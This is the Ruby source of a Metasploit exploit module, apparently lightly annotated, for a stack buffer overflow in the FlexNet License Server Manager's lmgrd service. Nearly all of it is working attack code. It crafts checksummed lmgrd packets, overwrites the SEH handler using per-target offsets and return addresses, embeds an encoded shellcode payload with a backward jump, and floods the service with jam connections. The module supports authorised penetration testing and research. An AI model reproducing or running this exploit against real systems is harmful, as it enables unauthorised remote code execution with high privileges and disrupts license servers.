GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/license/flexnet_lmgrd_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
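class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  # Size of the fixed lmgrd packet header assembled by create_packet:
  # 1 byte type (0x2f), 1 byte header checksum, 2 bytes data checksum,
  # 2 bytes total packet length, 14 bytes of zero padding.
  HEADER_LENGTH = 20

  # Largest value the 16-bit big-endian length field can carry. The packet
  # body is sized so that the whole packet is exactly this long.
  MAX_PACKET_LENGTH = 0xFFFF

  # Lookup table for the 16-bit data checksum: a reflected, table-driven
  # CRC with polynomial 0x3A5D. Computed once at load time; the table is
  # a constant and does not depend on the input.
  DATA_CRC_TABLE = (0..255).map do |index|
    crc = 0
    value = index
    8.times do
      crc = if ((crc ^ value) & 1) == 1
              ((crc >> 1) ^ 0x3A5D) & 0xFFFF
            else
              (crc >> 1) & 0xFFFF
            end
      value >>= 1
    end
    crc
  end.freeze

  # Module metadata and options.
  #
  # Target hash keys (used by build_packet_data):
  #   'Offset'          - number of body bytes before the SEH record
  #   'ShellcodeOffset' - number of body bytes before the encoded payload
  #   'Ret'             - pop/pop/ret address used for the SEH handler
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'FlexNet License Server Manager lmgrd Buffer Overflow',
      'Description'    => %q{
        This module exploits a vulnerability in the FlexNet
        License Server Manager.

        The vulnerability is due to the insecure usage of memcpy
        in the lmgrd service when handling network packets, which
        results in a stack buffer overflow.

        In order to improve reliability, this module will make lots of
        connections to lmgrd during each attempt to maximize its success.
      },
      'Author'         =>
        [
          'Luigi Auriemma',   # Vulnerability Discovery and PoC
          'Alexander Gavrun', # Vulnerability Discovery
          'juan vazquez',     # Metasploit module
          'sinn3r'            # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '81899' ],
          [ 'BID', '52718' ],
          [ 'ZDI', '12-052' ],
          [ 'URL', 'http://aluigi.altervista.org/adv/lmgrd_1-adv.txt' ],
          [ 'URL', 'http://www.flexerasoftware.com/pl/13057.htm' ] # Vendor advisory
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process'
        },
      'Payload'        =>
        {
          'Space' => 4000
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Debug', {} ],
          [ 'Autodesk Licensing Server Tools 11.5 / lmgrd 11.5.0.0 / Windows XP SP3',
            {
              'Offset'          => 10476,
              'ShellcodeOffset' => 5484,
              'Ret'             => 0x0047d01f # ppr from lmgrd.exe
            }
          ],
          [ 'Alias License Tools 10.8.0.7 / lmgrd 10.8.0.7 / Windows XP SP3',
            {
              'Offset'          => 7324,
              'ShellcodeOffset' => 2332,
              'Ret'             => 0x004eda91 # ppr from lmgrd.exe
            }
          ],
          [ 'Alias License Tools 10.8 / lmgrd 10.8.0.2 / Windows XP SP3',
            {
              'Offset'          => 7320,
              'ShellcodeOffset' => 2328,
              'Ret'             => 0x004eb2e1 # ppr from lmgrd.exe
            }
          ],
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => '2012-03-23'))

    register_options(
      [
        Opt::RPORT(27000),
        OptInt.new('Attempts', [ true, 'Number of attempts for the exploit phase', 20 ]),
        OptInt.new('Wait', [ true, 'Delay between brute force attempts', 2 ]),
        OptInt.new('Jam', [ true, 'Number of requests to jam the server', 100 ])
      ])
  end

  # 8-bit checksum of the packet header: byte 0 plus bytes 2..19, truncated
  # to one byte. Byte 1 is skipped because it is the slot the result is
  # written into (see create_packet).
  #
  # @param packet [String] at least HEADER_LENGTH bytes of packet
  # @return [Integer] checksum in 0..255
  # @raise [ArgumentError] when fewer than HEADER_LENGTH bytes are given
  def header_checksum(packet)
    if packet.bytesize < HEADER_LENGTH
      raise ArgumentError, "header checksum needs #{HEADER_LENGTH} bytes, got #{packet.bytesize}"
    end

    bytes = packet.unpack('C*')
    (bytes[0] + bytes[2, HEADER_LENGTH - 2].sum) & 0xFF
  end

  # 16-bit table-driven checksum (DATA_CRC_TABLE) over every byte of
  # packet_data, starting from a zero register.
  #
  # Iterates over bytes rather than characters so the result covers the
  # whole buffer regardless of the string's encoding.
  #
  # @param packet_data [String] bytes to checksum
  # @return [Integer] checksum in 0..0xFFFF
  def data_checksum(packet_data)
    packet_data.each_byte.reduce(0) do |crc, byte|
      (DATA_CRC_TABLE[byte ^ (crc & 0xFF)] ^ (crc >> 8)) & 0xFFFF
    end
  end

  # Wraps data in an lmgrd packet: HEADER_LENGTH-byte header followed by
  # data, with the big-endian length at offset 4, the data checksum (over
  # everything from offset 4 to the end) at offset 2, and the header
  # checksum (over the first HEADER_LENGTH bytes) at offset 1.
  #
  # The packet is built as a binary string so that every index and length
  # used here is a byte offset.
  #
  # @param data [String] packet body
  # @return [String] complete packet, ASCII-8BIT encoded
  # @raise [ArgumentError] when the packet would not fit the 16-bit length field
  def create_packet(data)
    pkt = [0x2f, 0, 0, 0].pack('CCnn') # type, header checksum, data checksum, length
    pkt << ("\x00" * 14)
    pkt << data.b

    if pkt.bytesize > MAX_PACKET_LENGTH
      raise ArgumentError, "packet of #{pkt.bytesize} bytes exceeds #{MAX_PACKET_LENGTH}"
    end

    pkt[4, 2] = [pkt.bytesize].pack('n')
    pkt[2, 2] = [data_checksum(pkt[4, pkt.bytesize - 4])].pack('n')
    pkt.setbyte(1, header_checksum(pkt[0, HEADER_LENGTH]))
    pkt
  end

  # Sends datastore['Jam'] empty packets, one connection each. Runs in a
  # separate framework thread started by do_exploit and is never joined.
  def jam
    pkt = create_packet('')

    datastore['Jam'].times do
      connect
      sock.put(pkt)
      disconnect
    end
  end

  # Runs up to datastore['Attempts'] attempts, stopping early once a
  # session exists, and reports the number of attempts actually made
  # when none succeeded.
  def exploit
    attempts = datastore['Attempts']

    attempts.times do |n|
      break if session_created?

      print_status("Attempt #{n + 1}/#{attempts} to exploit...")
      do_exploit
      sleep(datastore['Wait'])
    end

    print_error("Exploit didn't work after #{attempts} attempts") unless session_created?
  end

  # One attempt: start the jam thread, build the packet for the selected
  # target, send it and let the handler pick up any resulting session.
  def do_exploit
    framework.threads.spawn('jam', false) { jam }

    pkt = create_packet(build_packet_data(payload.encoded))

    connect
    sock.put(pkt)
    handler
    disconnect
  end

  # Builds the MAX_PACKET_LENGTH - HEADER_LENGTH byte packet body for the
  # current target. The 'Debug' target gets plain filler; the others get
  # the layout described by the target's 'ShellcodeOffset', 'Offset' and
  # 'Ret' values, padded with random text to the maximum packet size.
  #
  # NOTE(review): no check that the encoded payload fits between
  # 'ShellcodeOffset' and 'Offset'; the 'Space' => 4000 payload limit is
  # what keeps the third rand_text length non-negative.
  #
  # @param encoded_payload [String] payload.encoded
  # @return [String] packet body, ASCII-8BIT encoded
  def build_packet_data(encoded_payload)
    body_length = MAX_PACKET_LENGTH - HEADER_LENGTH
    return 'a' * body_length if target.name.match?(/Debug/)

    data = ''.b
    data << rand_text(target['ShellcodeOffset'])
    data << encoded_payload
    data << rand_text(target['Offset'] - target['ShellcodeOffset'] - encoded_payload.bytesize)
    data << generate_seh_record(target.ret)
    data << Metasm::Shellcode.assemble(Metasm::Ia32.new, 'jmp $-5000').encode_string
    data << rand_text(body_length - data.bytesize)
    data
  end
end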